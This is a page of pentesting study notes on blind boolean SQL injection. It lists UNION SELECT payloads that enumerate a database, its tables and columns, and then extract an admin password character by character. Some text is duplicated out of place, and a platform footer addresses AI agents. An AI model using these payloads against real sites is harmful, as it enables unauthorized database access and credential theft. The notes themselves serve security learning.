> For the complete documentation index, see [llms.txt](https://itrp19-notes.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://itrp19-notes.gitbook.io/notes/reference/hacking/web-app-pentesting/sql-injection/boolean-sql-injection-blind.md). # Boolean SQL Injection Blind Note: Boolean-based SQL Injection is tedious and requires a lot of manual guessing. Use SQLmap instead. In the blind sql injection, there is no error message returned back as an output hence we can't know if there is sql injection vulnerability. Boolean means that the response is either \[true] or \[false]. In real world scenario, \[false] means no data returned back as a response and \[true] is returned when the response contains data. The aim in this type of sql injection is to return \[true] so that we retrieve data. Say we have the URL below ``` http://sumwebsite.com/profile?id=1 ``` The corresponding SQL query for that is below ``` select * from profiles where id = '%1%' LIMIT 1; ``` To find a sql injection vulnerability, first we need the number of columns in this table. We would start with a payload like below ``` 0' UNION SELECT 1;-- ``` With the same method, we keep increasing numbers untill no error is returned which determines the number of colums. Once we determine the number of columns, we can start crafting payloads to enumerate the database. ``` 0' UNION SELECT 1,2,3 where database() like 's%';-- ``` In the above example, we used the \[like] operator to look for the entries where there is a database whose name starts with \[s]. Since this is boolean based, we need to use the \[like] statement in order to adhere to select \* from profiles where id = '%1%' LIMIT 1; 0' UNION SELECT 1;-- 0' UNION SELECT 1,2,3 where database() like 's%';-- the \[true] and \[false] forms of output. In order to find the database name, we need to keep adding and rotating between characters until we receive a response containing the database name. The next payload would look like the one below ``` 0' UNION SELECT 1,2,3 where database() like 'sq%';-- ``` Suppose you were able to find the database name and it was \[dbhacked] then you will need to dump its tables. ``` 0' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'dbhacked' and table_name like 'a%';-- ``` With the same manner, keep adding characters untill you hit a response containing table name. Suppose you found a table named \[users]. You want to dump its columns. ``` 0' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='dbhacked' and TABLE_NAME='users' and COLUMN_NAME like 'a%'; ``` Supposed you found column \[username] and \[password] then to dump them use below payload to find the users ``` 0' UNION SELECT 1,2,3 from users where username like 'a% ``` Suppose you found a username called \[admin] then use the below to dump its password. ``` 0' UNION SELECT 1,2,3 from users where username='admin' and password like 'a% ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://itrp19-notes.gitbook.io/notes/reference/hacking/web-app-pentesting/sql-injection/boolean-sql-injection-blind.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.